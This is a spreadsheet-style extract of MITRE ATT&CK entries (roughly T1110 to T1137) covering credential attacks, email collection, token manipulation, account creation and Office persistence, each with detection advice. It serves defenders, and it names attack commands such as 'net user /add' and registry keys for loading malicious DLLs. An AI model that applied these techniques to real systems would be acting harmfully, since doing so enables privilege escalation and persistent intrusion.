    <t>Adversaries may use password cracking to attempt to recover usable credentials, such as plaintext passwords, when credential material such as password hashes are obtained. [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) is used to obtain password hashes, this may only get an adversary so far when [Pass the Hash](https://attack.mitre.org/techniques/T1550/002) is not an option.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</si>
  <si>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https://attack.mitre.org/techniques/T1110/002</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</si>
  <si>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</si>
  <si>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Azure AD, Linux, Office 365, Windows, macOS</t>
  </si>
  <si>
    <t>Brute Force: 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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1110/003</t>
  </si>
  <si>
    <t>06 April 2021</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</si>
  <si>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</si>
  <si>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John Strand; Microsoft Threat Intelligence Center (MSTIC)</t>
  </si>
  <si>
    <t>Brute Force: Credential Stuffing</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1110/004</t>
  </si>
  <si>
    <t>Anastasios Pingios; Diogo Fernandes</t>
  </si>
  <si>
    <t>Adversaries may target two-factor authentication mechanisms, such as smart cards, to gain access to credentials that can be used to access systems, services, and network resources. Use of two or multi-factor authentication (2FA or MFA) is recommended and provides a higher level of security than user names and passwords alone, but organizations should be aware of techniques that could be used to intercept and bypass these security mechanisms. 
If a smart card is used for two-factor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2FA may be intercepted and used by an adversary to authenticate. It is common for one-time codes to be sent via out-of-band communications (email, SMS). If the device and/or service is not secured, then it may be vulnerable to interception. Although primarily focused on by cyber criminals, these authentication mechanisms have been targeted by advanced actors. (Citation: Operation Emmental)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1111</t>
  </si>
  <si>
    <t>Detecting use of proxied smart card connections by an adversary may be difficult because it requires the token to be inserted into a system; thus it is more likely to be in use by a legitimate user and blend in with other network behavior.
Similar to [Input Capture](https://attack.mitre.org/techniques/T1056), keylogging activity can take various forms but can may be detected via installation of a driver, setting a hook, or usage of particular API calls associated with polling to intercept keystrokes.</t>
  </si>
  <si>
    <t>Smart card Proxy: Use of smart cards for single or multifactor authentication to access to network resources. Attached smart card reader with card inserted.
Out-of-band one-time code: Access to the device, service, or communications to intercept the one-time code.
Hardware token: Access to the seed and algorithm of generating one-time codes.</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1112</t>
  </si>
  <si>
    <t>13 August 2020</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</si>
  <si>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</si>
  <si>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Bartosz Jerzman; David Lu, Tripwire; Travis Smith, Tripwire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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1113</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</si>
  <si>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</si>
  <si>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 xml:space="preserve">Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients. </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1114</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</si>
  <si>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&lt;code&gt;X-MS-Exchange-Organization-AutoForwarded&lt;/code&gt; set to true, &lt;code&gt;X-MailFwdBy&lt;/code&gt; and &lt;code&gt;X-Forwarded-To&lt;/code&gt;. The &lt;code&gt;forwardingSMTPAddress&lt;/code&gt;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&lt;code&gt;X-MS-Exchange-Organization-AutoForwarded&lt;/code&gt; header (indicating auto-forwarding) without a corresponding number of emails that match the appearance of a forwarded message may indicate that further investigation is needed at the administrator level rather than user-level.</t>
  </si>
  <si>
    <t>Google Workspace, Linux, Office 365, Windows, macOS</t>
  </si>
  <si>
    <t>Swetha Prabakaran, Microsoft Threat Intelligence Center (MSTIC)</t>
  </si>
  <si>
    <t>Email Collection: Local Email Collection</t>
  </si>
  <si>
    <t>Adversaries may target user email on local systems to collect sensitive information. Files containing email data can be acquired from a user’s local system, such as Outlook storage or cache files.
Outlook stores data locally in offline data files with an extension of .ost. Outlook 2010 and later supports .ost file sizes up to 50GB, while earlier versions of Outlook support up to 20GB.(Citation: Outlook File Sizes) IMAP accounts in Outlook 2013 (and earlier) and POP accounts use Outlook Data Files (.pst) as opposed to .ost, whereas IMAP accounts in Outlook 2016 (and later) use .ost files. Both types of Outlook data files are typically stored in `C:\Users\&lt;username&gt;\Documents\Outlook Files` or `C:\Users\&lt;username&gt;\AppData\Local\Microsoft\Outlook`.(Citation: Microsoft Outlook Files)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1114/001</t>
  </si>
  <si>
    <t>19 February 2020</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</si>
  <si>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</si>
  <si>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Email Collection: Remote Email Collection</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1114/002</t>
  </si>
  <si>
    <t>Monitor for unusual login activity from unknown or abnormal locations, especially for privileged accounts (ex: Exchange administrator account).</t>
  </si>
  <si>
    <t>Email Collection: Email Forwarding Rule</t>
  </si>
  <si>
    <t>Adversaries may setup email forwarding rules to collect sensitive information. Adversaries may abuse email-forwarding rules to monitor the activities of a victim, steal information, and further gain intelligence on the victim or the victim’s organization to use as part of further exploits or operations.(Citation: US-CERT TA18-068A 2018) Furthermore, email forwarding rules can allow adversaries to maintain persistent access to victim's emails even after compromised credentials are reset by administrators.(Citation: Pfammatter - Hidden Inbox Rules) Most email clients allow users to create inbox rules for various email functions, including forwarding to a different recipient. These rules may be created through a local email application, a web interface, or by command-line interface. Messages can be forwarded to internal or external recipients, and there are no restrictions limiting the extent of this rule. Administrators may also create forwarding rules for user accounts with the same considerations and outcomes.(Citation: Microsoft Tim McMichael Exchange Mail Forwarding 2)(Citation: Mac Forwarding Rules)
Any user or administrator within the organization (or adversary with valid credentials) can create rules to automatically forward all received messages to another recipient, forward emails to different locations based on the sender, and more. Adversaries may also hide the rule by making use of the Microsoft Messaging API (MAPI) to modify the rule properties, making it hidden and not visible from Outlook, OWA or most Exchange Administration tools.(Citation: Pfammatter - Hidden Inbox Rules)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1114/003</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</si>
  <si>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</si>
  <si>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Microsoft Security; Swetha Prabakaran, Microsoft Threat Intelligence Center (MSTIC)</t>
  </si>
  <si>
    <t>Adversaries may collect data stored in the clipboard from users copying information within or between applications. 
In Windows, Applications can access clipboard data by using the Windows API.(Citation: MSDN Clipboard) OSX provides a native command, &lt;code&gt;pbpaste&lt;/code&gt;, to grab clipboard contents.(Citation: Operating with EmPyre)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1115</t>
  </si>
  <si>
    <t>23 April 2020</t>
  </si>
  <si>
    <t>Access to the clipboard is a legitimate function of many applications on an operating system. If an organization chooses to monitor for this behavior, then the data will likely need to be correlated against other suspicious or non-user-driven activity.</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</si>
  <si>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This functionality could also be built into remote access tools. 
This technique may incorporate use of other techniques such as [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) and [Lateral Tool Transfer](https://attack.mitre.org/techniques/T1570) to identify and move files.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1119</t>
  </si>
  <si>
    <t>31 March 2020</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</si>
  <si>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</si>
  <si>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Permissions to access directories and files that store information of interest.</t>
  </si>
  <si>
    <t>Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system.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</si>
  <si>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https://attack.mitre.org/techniques/T1120</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1123</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</si>
  <si>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</si>
  <si>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 (Citation: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 (Citation: Technet Windows Time Service)
This information could be useful for performing other techniques, such as executing a file with a [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053) (Citation: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</si>
  <si>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https://attack.mitre.org/techniques/T1124</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</si>
  <si>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t>
  </si>
  <si>
    <t>FIRST.ORG's Cyber Threat Intelligence SIG</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1125</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1127</t>
  </si>
  <si>
    <t>Monitor for abnormal presence of these or other utilities that enable proxy execution that are typically used for development, debugging, and reverse engineering on a system that is not used for these purposes may be suspicious.
Use process monitoring to monitor the execution and arguments of from developer utilities that may be abused. Compare recent invocations of those binaries with prior history of known good arguments and executed binaries to determine anomalous and potentially adversarial activity. It is likely that these utilities will be used by software developers or for other software development related tasks, so if it exists and is used outside of that context, then the event may be suspicious. Command arguments used before and after invocation of the utilities may also be useful in determining the origin and purpose of the binary being executed.</t>
  </si>
  <si>
    <t>Casey Smith; Matthew Demaske, Adaptforward</t>
  </si>
  <si>
    <t>Application control</t>
  </si>
  <si>
    <t>Trusted Developer Utilities Proxy Execution: MSBuild</t>
  </si>
  <si>
    <t>Adversaries may use MSBuild to proxy execution of code through a trusted Windows utility. MSBuild.exe (Microsoft Build Engine) is a software build platform used by Visual Studio. It handles XML formatted project files that define requirements for loading and building various platforms and configurations.(Citation: MSDN MSBuild)
Adversaries can abuse MSBuild to proxy execution of malicious code. The inline task capability of MSBuild that was introduced in .NET version 4 allows for C# or Visual Basic code to be inserted into an XML project file.(Citation: MSDN MSBuild)(Citation: Microsoft MSBuild Inline Tasks 2017) MSBuild will compile and execute the inline task. MSBuild.exe is a signed Microsoft binary, so when it is used this way it can execute arbitrary code and bypass application control defenses that are configured to allow MSBuild.exe execution.(Citation: LOLBAS Msbuild)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1127/001</t>
  </si>
  <si>
    <t>Use process monitoring to monitor the execution and arguments of MSBuild.exe. Compare recent invocations of those binaries with prior history of known good arguments and executed binaries to determine anomalous and potentially adversarial activity. Command arguments used before and after invocation of the utilities may also be useful in determining the origin and purpose of the binary being executed.</t>
  </si>
  <si>
    <t>@ionstorm; Carrie Roberts, @OrOneEqualsOne</t>
  </si>
  <si>
    <t xml:space="preserve"> .NET Framework version 4 or higher</t>
  </si>
  <si>
    <t>Adversaries may execute malicious payloads via loading shared modules.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&lt;code&gt;CreateProcess&lt;/code&gt;, &lt;code&gt;LoadLibrary&lt;/code&gt;, etc. of the Win32 API. (Citation: Wikipedia Windows Library Files)
The module loader can load DLLs:
* via specification of the (fully-qualified or relative) DLL pathname in the IMPORT directory;
* via EXPORT forwarded to another DLL, specified with (fully-qualified or relative) pathname (but without extension);
* via an NTFS junction or symlink program.exe.local with the fully-qualified or relative pathname of a directory containing the DLLs specified in the IMPORT directory or forwarded EXPORTs;
* via &lt;code&gt;&amp;#x3c;file name="filename.extension" loadFrom="fully-qualified or relative pathname"&amp;#x3e;&lt;/code&gt; in an embedded or external "application manifest". The file name refers to an entry in the IMPORT directory or a forwarded EXPORT.
Adversaries may use this functionality as a way to execute arbitrary payloads on a victim system. For example, malware may execute share modules to load additional components or features.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1129</t>
  </si>
  <si>
    <t>Monitoring DLL module loads may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances, since benign use of Windows modules load functions are common and may be difficult to distinguish from malicious behavior. Legitimate software will likely only need to load routine, bundled DLL modules or Windows system DLLs such that deviation from known module loads may be suspicious. Limiting DLL module loads to &lt;code&gt;%SystemRoot%&lt;/code&gt; and &lt;code&gt;%ProgramFiles%&lt;/code&gt; directories will protect against module loads from unsafe paths. 
Correlation of other events with behavior surrounding module loads using API monitoring and suspicious DLLs written to disk will provide additional context to an event that may assist in determining if it is due to malicious behavior.</t>
  </si>
  <si>
    <t>Stefan Kanthak</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</si>
  <si>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systems.(Citation: Wikipedia Binary-to-text Encoding) (Citation: Wikipedia Character Encoding) Some data encoding systems may also result in data compression, such as gzip.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1132</t>
  </si>
  <si>
    <t>Data Encoding: Standard Encoding</t>
  </si>
  <si>
    <t>Adversaries may encode data with a standard data encoding system to make the content of command and control traffic more difficult to detect. Command and control (C2) information can be encoded using a standard data encoding system that adheres to existing protocol specifications. Common data encoding schemes include ASCII, Unicode, hexadecimal, Base64, and MIME.(Citation: Wikipedia Binary-to-text Encoding) (Citation: Wikipedia Character Encoding) Some data encoding systems may also result in data compression, such as gzip.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1132/001</t>
  </si>
  <si>
    <t>Data Encoding: Non-Standard Encoding</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may encode data with a non-standard data encoding system to make the content of command and control traffic more difficult to detect. Command and control (C2) information can be encoded using a non-standard data encoding system that diverges from existing protocol specifications. Non-standard data encoding schemes may be based on or related to standard data encoding schemes, such as a modified Base64 encoding for the message body of an HTTP request.(Citation: Wikipedia Binary-to-text Encoding) (Citation: Wikipedia Character Encoding) </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1132/002</t>
  </si>
  <si>
    <t>Adversaries may leverage external-facing remote services to initially access and/or persist within a network. Remote services such as VPNs, Citrix, and other access mechanisms allow users to connect to internal enterprise network resources from external locations. There are often remote service gateways that manage connections and credential authentication for these services. Services such as [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006) and [VNC](https://attack.mitre.org/techniques/T1021/005) can also be used externally.(Citation: MacOS VNC software for Remote Desktop)
Access to [Valid Accounts](https://attack.mitre.org/techniques/T1078) to use the service is often a requirement, which could be obtained through credential pharming or by obtaining the credentials from users after compromising the enterprise network.(Citation: Volexity Virtual Private Keylogging) Access to remote services may be used as a redundant or persistent access mechanism during an operation.
Access may also be gained through an exposed service that doesn’t require authentication. In containerized environments, this may include an exposed Docker API, Kubernetes API server, kubelet, or web application such as the Kubernetes dashboard.(Citation: Trend Micro Exposed Docker Server)(Citation: Unit 42 Hildegard Malware)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1133</t>
  </si>
  <si>
    <t>19 August 2021</t>
  </si>
  <si>
    <t>Initial Access, Persistence</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</si>
  <si>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</si>
  <si>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Alfredo Oliveira, Trend Micro; Ariel Shuper, Cisco; Brad Geesaman, @bradgeesaman; Daniel Oakley; David Fiser, @anu4is, Trend Micro; ExtraHop; Idan Frimark, Cisco; Jay Chen, Palo Alto Networks; Magno Logan, @magnologan, Trend Micro; Rory McCune, Aqua Security; Travis Smith, Tripwire; Vishwas Manral, McAfee; Yossi Weizman, Azure Defender Research Team; Yuval Avrahami, Palo Alto Networks</t>
  </si>
  <si>
    <t>Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
An adversary can use built-in Windows API functions to copy access tokens from existing processes; this is known as token stealing. These token can then be applied to an existing process (i.e. [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001)) or used to spawn a new process (i.e. [Create Process with Token](https://attack.mitre.org/techniques/T1134/002)). An adversary must already be in a privileged user context (i.e. administrator) to steal a token. However, adversaries commonly use token stealing to elevate their security context from the administrator level to the SYSTEM level. An adversary can then use a token to authenticate to a remote system as the account for that token if the account has appropriate permissions on the remote system.(Citation: Pentestlab Token Manipulation)
Any standard user can use the &lt;code&gt;runas&lt;/code&gt; command, and the Windows API functions, to create impersonation tokens; it does not require access to an administrator account. There are also other mechanisms, such as Active Directory fields, that can be used to modify access tokens.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1134</t>
  </si>
  <si>
    <t>14 December 2017</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</si>
  <si>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There are many Windows API calls a payload can take advantage of to manipulate access tokens (e.g., &lt;code&gt;LogonUser&lt;/code&gt; (Citation: Microsoft LogonUser), &lt;code&gt;DuplicateTokenEx&lt;/code&gt;(Citation: Microsoft DuplicateTokenEx), and &lt;code&gt;ImpersonateLoggedOnUser&lt;/code&gt;(Citation: Microsoft ImpersonateLoggedOnUser)). Please see the referenced Windows API pages for more information.
Query systems for process and thread token information and look for inconsistencies such as user owns processes impersonating the local SYSTEM account.(Citation: BlackHat Atkinson Winchester Token Manipulation)
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t>
  </si>
  <si>
    <t>Jared Atkinson, @jaredcatkinson; Robby Winchester, @robwinchester3; Tom Ueltschi @c_APT_ure; Travis Smith, Tripwire</t>
  </si>
  <si>
    <t>SYSTEM</t>
  </si>
  <si>
    <t>File system access controls, Heuristic Detection, Host forensic analysis, System access controls, Windows User Account Control</t>
  </si>
  <si>
    <t>Access Token Manipulation: Token Impersonation/Theft</t>
  </si>
  <si>
    <t>Adversaries may duplicate then impersonate another user's token to escalate privileges and bypass access controls. An adversary can create a new access token that duplicates an existing token using &lt;code&gt;DuplicateToken(Ex)&lt;/code&gt;. The token can then be used with &lt;code&gt;ImpersonateLoggedOnUser&lt;/code&gt; to allow the calling thread to impersonate a logged on user's security context, or with &lt;code&gt;SetThreadToken&lt;/code&gt; to assign the impersonated token to a thread.
An adversary may do this when they have a specific, existing process they want to assign the new token to. For example, this may be useful for when the target user has a non-network logon session on the system.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1134/001</t>
  </si>
  <si>
    <t>18 February 2020</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</si>
  <si>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</si>
  <si>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File system access controls, System access controls, Windows User Account Control</t>
  </si>
  <si>
    <t>Access Token Manipulation: Create Process with Token</t>
  </si>
  <si>
    <t>Adversaries may create a new process with a different token to escalate privileges and bypass access controls. Processes can be created with the token and resulting security context of another user using features such as &lt;code&gt;CreateProcessWithTokenW&lt;/code&gt; and &lt;code&gt;runas&lt;/code&gt;.(Citation: Microsoft RunAs)
Creating processes with a different token may require the credentials of the target user, specific privileges to impersonate that user, or access to the token to be used (ex: gathered via other means such as [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001) or [Make and Impersonate Token](https://attack.mitre.org/techniques/T1134/003)).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1134/002</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</si>
  <si>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</si>
  <si>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Vadim Khrykov</t>
  </si>
  <si>
    <t>Access Token Manipulation: Make and Impersonate Token</t>
  </si>
  <si>
    <t>Adversaries may make and impersonate tokens to escalate privileges and bypass access controls. If an adversary has a username and password but the user is not logged onto the system, the adversary can then create a logon session for the user using the &lt;code&gt;LogonUser&lt;/code&gt; function. The function will return a copy of the new session's access token and the adversary can use &lt;code&gt;SetThreadToken&lt;/code&gt; to assign the token to a thread.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1134/003</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</si>
  <si>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If an adversary is using a payload that calls the Windows token APIs directly, analysts can detect token manipulation only through careful analysis of user network activity, examination of running processes, and correlation with other endpoint and network behavior.
Analysts can also monitor for use of Windows APIs such as &lt;code&gt;LogonUser&lt;/code&gt; and &lt;code&gt; SetThreadToken&lt;/code&gt; and correlate activity with other suspicious behavior to reduce false positives that may be due to normal benign use by users and administrators.</t>
  </si>
  <si>
    <t>Access Token Manipulation: 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</si>
  <si>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&lt;code&gt;CreateProcess&lt;/code&gt; API call, which supports a parameter that defines the PPID to use.(Citation: DidierStevens SelectMyParent Nov 2009) This functionality is used by Windows features such as User Account Control (UAC) to correctly set the PPID after a requested elevated process is spawned by SYSTEM (typically via &lt;code&gt;svchost.exe&lt;/code&gt; or &lt;code&gt;consent.exe&lt;/code&gt;) rather than the current user context.(Citation: Microsoft UAC Nov 2018)
Adversaries may abuse these mechanisms to evade defenses, such as those blocking processes spawning directly from Office documents, and analysis targeting unusual/potentially malicious parent-child process relationships, such as spoofing the PPID of [PowerShell](https://attack.mitre.org/techniques/T1059/001)/[Rundll32](https://attack.mitre.org/techniques/T1218/011) to be &lt;code&gt;explorer.exe&lt;/code&gt; rather than an Office document delivered as part of [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001).(Citation: CounterCept PPID Spoofing Dec 2018) This spoofing could be executed via [Visual Basic](https://attack.mitre.org/techniques/T1059/005) within a malicious Office document or any code that can perform [Native API](https://attack.mitre.org/techniques/T1106).(Citation: CTD PPID Spoofing Macro Mar 2019)(Citation: CounterCept PPID Spoofing Dec 2018)
Explicitly assigning the PPID may also enable elevated privileges given appropriate access rights to the parent process. For example, an adversary in a privileged user context (i.e. administrator) may spawn a new process and assign the parent as a process running as SYSTEM (such as &lt;code&gt;lsass.exe&lt;/code&gt;), causing the new process to be elevated via the inherited access token.(Citation: XPNSec PPID Nov 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1134/004</t>
  </si>
  <si>
    <t>Look for inconsistencies between the various fields that store PPID information, such as the EventHeader ProcessId from data collected via Event Tracing for Windows (ETW), Creator Process ID/Name from Windows event logs, and the ProcessID and ParentProcessID (which are also produced from ETW and other utilities such as Task Manager and Process Explorer). The ETW provided EventHeader ProcessId identifies the actual parent process.(Citation: CounterCept PPID Spoofing Dec 2018)
Monitor and analyze API calls to &lt;code&gt;CreateProcess&lt;/code&gt;/&lt;code&gt;CreateProcessA&lt;/code&gt;, specifically those from user/potentially malicious processes and with parameters explicitly assigning PPIDs (ex: the Process Creation Flags of 0x8XXX, indicating that the process is being created with extended startup information(Citation: Microsoft Process Creation Flags May 2018)). Malicious use of &lt;code&gt;CreateProcess&lt;/code&gt;/&lt;code&gt;CreateProcessA&lt;/code&gt; may also be proceeded by a call to &lt;code&gt;UpdateProcThreadAttribute&lt;/code&gt;, which may be necessary to update process creation attributes.(Citation: Secuirtyinbits Ataware3 May 2019) This may generate false positives from normal UAC elevation behavior, so compare to a system baseline/understanding of normal system activity if possible.</t>
  </si>
  <si>
    <t>Wayne Silva, F-Secure Countercept</t>
  </si>
  <si>
    <t>Heuristic Detection, Host forensic analysis</t>
  </si>
  <si>
    <t>Access Token Manipulation: SID-History Injection</t>
  </si>
  <si>
    <t>Adversaries may use SID-History Injection to escalate privileges and bypass access controls. The Windows security identifier (SID) is a unique value that identifies a user or group account. SIDs are used by Windows security in both security descriptors and access tokens. (Citation: Microsoft SID) An account can hold additional SIDs in the SID-History Active Directory attribute (Citation: Microsoft SID-History Attribute), allowing inter-operable account migration between domains (e.g., all values in SID-History are included in access tokens).
With Domain Administrator (or equivalent) rights, harvested or well-known SID values (Citation: Microsoft Well Known SIDs Jun 2017) may be inserted into SID-History to enable impersonation of arbitrary users/groups such as Enterprise Administrators. This manipulation may result in elevated access to local resources and/or access to otherwise inaccessible domains via lateral movement techniques such as [Remote Services](https://attack.mitre.org/techniques/T1021), [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002), or [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1134/005</t>
  </si>
  <si>
    <t>Examine data in user’s SID-History attributes using the PowerShell &lt;code&gt;Get-ADUser&lt;/code&gt; cmdlet (Citation: Microsoft Get-ADUser), especially users who have SID-History values from the same domain. (Citation: AdSecurity SID History Sept 2015) Also monitor account management events on Domain Controllers for successful and failed changes to SID-History. (Citation: AdSecurity SID History Sept 2015) (Citation: Microsoft DsAddSidHistory)
Monitor for Windows API calls to the &lt;code&gt;DsAddSidHistory&lt;/code&gt; function. (Citation: Microsoft DsAddSidHistory)</t>
  </si>
  <si>
    <t>Alain Homewood, Insomnia Security; Vincent Le Toux</t>
  </si>
  <si>
    <t>Administrator, SYSTEM</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1135</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</si>
  <si>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</si>
  <si>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Adversaries may create an account to maintain access to victim systems. With a sufficient level of access, creating such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.
Accounts may be created on the local system or within a domain or cloud tenant. In cloud environments, adversaries may create accounts that only have access to specific services, which can reduce the chance of detection.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1136</t>
  </si>
  <si>
    <t>Monitor for processes and command-line parameters associated with account creation, such as &lt;code&gt;net user&lt;/code&gt; or &lt;code&gt;useradd&lt;/code&gt;.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Collect usage logs from cloud administrator accounts to identify unusual activity in the creation of new accounts and assignment of roles to those accounts. Monitor for accounts assigned to admin roles that go over a certain threshold of known admins.</t>
  </si>
  <si>
    <t>Microsoft Threat Intelligence Center (MSTIC); Praetorian</t>
  </si>
  <si>
    <t>Create Account: Local Account</t>
  </si>
  <si>
    <t>Adversaries may create a local account to maintain access to victim systems. Local accounts are those configured by an organization for use by users, remote support, services, or for administration on a single system or service. With a sufficient level of access, the &lt;code&gt;net user /add&lt;/code&gt; command can be used to create a local account. On macOS systems the &lt;code&gt;dscl -create&lt;/code&gt; command can be used to create a local account.
Such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1136/001</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</si>
  <si>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t>
  </si>
  <si>
    <t>Create Account: Domain Account</t>
  </si>
  <si>
    <t>Adversaries may create a domain account to maintain access to victim systems. Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover user, administrator, and service accounts. With a sufficient level of access, the &lt;code&gt;net user /add /domain&lt;/code&gt; command can be used to create a domain account.
Such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1136/002</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</si>
  <si>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</si>
  <si>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Create Account: Cloud Account</t>
  </si>
  <si>
    <t>Adversaries may create a cloud account to maintain access to victim systems. With a sufficient level of access, such accounts may be used to establish secondary credentialed access that does not require persistent remote access tools to be deployed on the system.(Citation: Microsoft O365 Admin Roles)(Citation: Microsoft Support O365 Add Another Admin, October 2019)(Citation: AWS Create IAM User)(Citation: GCP Create Cloud Identity Users)(Citation: Microsoft Azure AD Users)
Adversaries may create accounts that only have access to specific cloud services, which can reduce the chance of detection.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1136/003</t>
  </si>
  <si>
    <t>29 January 2020</t>
  </si>
  <si>
    <t>Collect usage logs from cloud user and administrator accounts to identify unusual activity in the creation of new accounts and assignment of roles to those accounts. Monitor for accounts assigned to admin roles that go over a certain threshold of known admins.</t>
  </si>
  <si>
    <t>Azure AD, Google Workspace, IaaS, Office 365</t>
  </si>
  <si>
    <t>Adversaries may leverage Microsoft Office-based applications for persistence between startups. Microsoft Office is a fairly common application suite on Windows-based operating systems within an enterprise network. There are multiple mechanisms that can be used with Office for persistence when an Office-based application is started; this can include the use of Office Template Macros and add-ins.
A variety of features have been discovered in Outlook that can be abused to obtain persistence, such as Outlook rules, forms, and Home Page.(Citation: SensePost Ruler GitHub) These persistence mechanisms can work within Outlook or be used through Office 365.(Citation: TechNet O365 Outlook Rules)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1137</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</si>
  <si>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</si>
  <si>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Loic Jaquemet; Microsoft Threat Intelligence Center (MSTIC); Nick Carr, Mandiant; Praetorian; Ricardo Dias; Sahar Shukrun</t>
  </si>
  <si>
    <t>Office Application Startup: Office Template Macros</t>
  </si>
  <si>
    <t>Adversaries may abuse Microsoft Office templates to obtain persistence on a compromised system. Microsoft Office contains templates that are part of common Office applications and are used to customize styles. The base templates within the application are used each time an application starts. (Citation: Microsoft Change Normal Template)
Office Visual Basic for Applications (VBA) macros (Citation: MSDN VBA in Office) can be inserted into the base template and used to execute code when the respective Office application starts in order to obtain persistence. Examples for both Word and Excel have been discovered and published. By default, Word has a Normal.dotm template created that can be modified to include a malicious macro. Excel does not have a template file created by default, but one can be added that will automatically be loaded.(Citation: enigma0x3 normal.dotm)(Citation: Hexacorn Office Template Macros) Shared templates may also be stored and pulled from remote locations.(Citation: GlobalDotName Jun 2019) 
Word Normal.dotm location:&lt;br&gt;
&lt;code&gt;C:\Users\&amp;lt;username&amp;gt;\AppData\Roaming\Microsoft\Templates\Normal.dotm&lt;/code&gt;
Excel Personal.xlsb location:&lt;br&gt;
&lt;code&gt;C:\Users\&amp;lt;username&amp;gt;\AppData\Roaming\Microsoft\Excel\XLSTART\PERSONAL.XLSB&lt;/code&gt;
Adversaries may also change the location of the base template to point to their own by hijacking the application's search order, e.g. Word 2016 will first look for Normal.dotm under &lt;code&gt;C:\Program Files (x86)\Microsoft Office\root\Office16\&lt;/code&gt;, or by modifying the GlobalDotName registry key. By modifying the GlobalDotName registry key an adversary can specify an arbitrary location, file name, and file extension to use for the template that will be loaded on application startup. To abuse GlobalDotName, adversaries may first need to register the template as a trusted document or place it in a trusted location.(Citation: GlobalDotName Jun 2019) 
An adversary may need to enable macros to execute unrestricted depending on the system or enterprise security policy on use of macros.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1137/001</t>
  </si>
  <si>
    <t>07 November 2019</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</si>
  <si>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</si>
  <si>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Office Application Startup: Office Test</t>
  </si>
  <si>
    <t>Adversaries may abuse the Microsoft Office "Office Test" Registry key to obtain persistence on a compromised system. An Office Test Registry location exists that allows a user to specify an arbitrary DLL that will be executed every time an Office application is started. This Registry key is thought to be used by Microsoft to load DLLs for testing and debugging purposes while developing Office applications. This Registry key is not created by default during an Office installation.(Citation: Hexacorn Office Test)(Citation: Palo Alto Office Test Sofacy)
There exist user and global Registry keys for the Office Test feature:
* &lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\Office test\Special\Perf&lt;/code&gt;
* &lt;code&gt;HKEY_LOCAL_MACHINE\Software\Microsoft\Office test\Special\Perf&lt;/code&gt;
Adversaries may add this Registry key and specify a malicious DLL that will be executed whenever an Office application, such as Word or Excel, is started.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1137/002</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</si>
  <si>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</si>
  <si>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Office 2007, 2010, 2013, and 2016</t>
  </si>
  <si>
    <t>Office Application Startup: Outlook Forms</t>
  </si>
  <si>
    <t>Adversaries may abuse Microsoft Outlook forms to obtain persistence on a compromised system. Outlook forms are used as templates for presentation and functionality in Outlook messages. Custom Outlook forms can be created that will execute code when a specifically crafted email is sent by an adversary utilizing the same custom Outlook form.(Citation: SensePost Outlook Forms)
Once malicious forms have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious forms will execute when an adversary sends a specifically crafted email to the user.(Citation: SensePost Outlook Forms)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1137/003</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</si>
  <si>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</si>
  <si>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Office Application Startup: Outlook Home Page</t>
  </si>
  <si>
